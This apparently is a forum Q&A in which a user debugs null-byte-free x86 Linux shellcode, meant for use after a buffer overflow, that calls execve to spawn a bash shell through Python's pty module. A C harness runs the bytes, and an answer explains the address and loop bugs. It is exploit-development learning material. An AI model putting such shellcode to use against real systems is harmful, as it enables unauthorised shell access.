Update: I have fixed the argv array pointers not being valid causing the continuous loop and have updated the assembly code. Now the only issue is the disappearing space char on compilation.
I’ve been experimenting with executing shellcode after exploiting a buffer overflow on a 32-bit Linux VM. My assembly program simply uses execve to start a shell via python (I wanted to test passing arguments in execve and not just run /bin/bash), and when I compile the .asm into a program it runs fine, however not when I use it as shellcode. In order to get it to run as shellcode, I know I need to remove null bytes so that they aren’t parsed as null terminators that cut my string off early.
For the sake of testing, I am using a template C program for executing shellcode:
#include <stdio.h> unsigned char code[] = "shellcodegoeshere" int main(int argc, char **argv) { int (*ret)() = (int(*)())code; ret(); }
I changed the relative addressing in my program so that it instead uses offsets from esi when data is popped, replaced any null’s with “N” to be replaced in runtime, and moved 0 into those locations by xor’ing a register by itself and moving it’s value at those offsets.
My original program is this:
global _start section .text _start: jmp short call_shellcode shellcode: pop esi lea ebx, [rel arg1] lea ecx, [rel args] xor edx, edx xor eax, eax mov eax, 0xb int 0x80 call_shellcode: call shellcode arg1 db "/usr/bin/python",0 arg2 db "-c",0 arg3 db "import pty; pty.spawn(",34,"/bin/bash",34,")",0 args dd arg1, arg2, arg3, 0
and this is what it looks like after I try taking away the null bytes:
global _start section .text _start: jmp short call_shellcode shellcode: pop esi xor eax, eax mov byte [esi+15], al mov byte [esi+18], al mov byte [esi+53], al mov dword [esi+53+4*3], eax lea ebx, [esi] ;lea ecx, [esi+54] (couldn't be accessed via shellcode) xor ecx, ecx push ecx lea ecx, [esi+19] ; now will make an array of pointers that can still be accessed via shellcode push ecx lea ecx, [esi+16] push ecx lea ecx, [esi] push ecx mov ecx, esp xor edx, edx mov al, 0xb int 0x80 call_shellcode: call shellcode arg1 db "/usr/bin/pythonN" arg2 db "-cN" arg3 db "import pty; pty.spawn(",34,"/bin/bash",34,")N" ;args dd arg1, arg2, arg3, "NNNN" (these addresses were set at compilation meaning they were no longer valid when in shellcode)
When looking at my original program, reading from esi looks like this before the execve call:
However in my modified shellcode with no null bytes, reading from esi looks like this before and after replacing chars, prior to the execve call:
Before:
After:
As you can see, for some reason the space between the “import pty” disappears, the 0x20 is even missing in the shellcode when I look at it byte by byte. When this happens, my code reaches the end of main in C and loops again, repeating the shellcode instructions. I’ve tried manually adding the 0x20 back, and despite the output of checking strings from esi being the same as my working original program, I still seem to get this loop that continuously goes back to the start of main in gdb via a call to my pop instruction as the interrupt doesn’t start python successfully:
I know that when the call to execv is successful I shouldn’t reach that bottom instruction. Judging by the missing space character I get, and the fact I’m getting a continuous loop even when it’s present, I know I’ve done something wrong going between my original program and this one without null bytes- I just don’t know what it is.
This is what I can read from esi just after the pop:
If anybody could help it would be greatly appreciated. Thanks.
Advertisement
Answer
Failure to invoke Python
The execve
syscall is not working properly because args
is populated with constant addresses at assembly-time. args
must instead be filled with addresses at runtime. In this case, that can be achieved using addresses relative to esi
.
Missing space characters
The space characters aren’t missing; they were never there in the first place. Spaces are how shells separate arguments. execve
doesn’t separate arguments with anything, because each argument is its own string somewhere in memory. The fact that your three strings are all consecutive in memory and can be printed as one long string is simply a detail of your implementation, and is not a requirement of execve
.
Loop
When the execve
syscall fails, execution continues to the next instruction:
call shellcode
If you let this run long enough, you’d get a stack overflow from the number of call
s.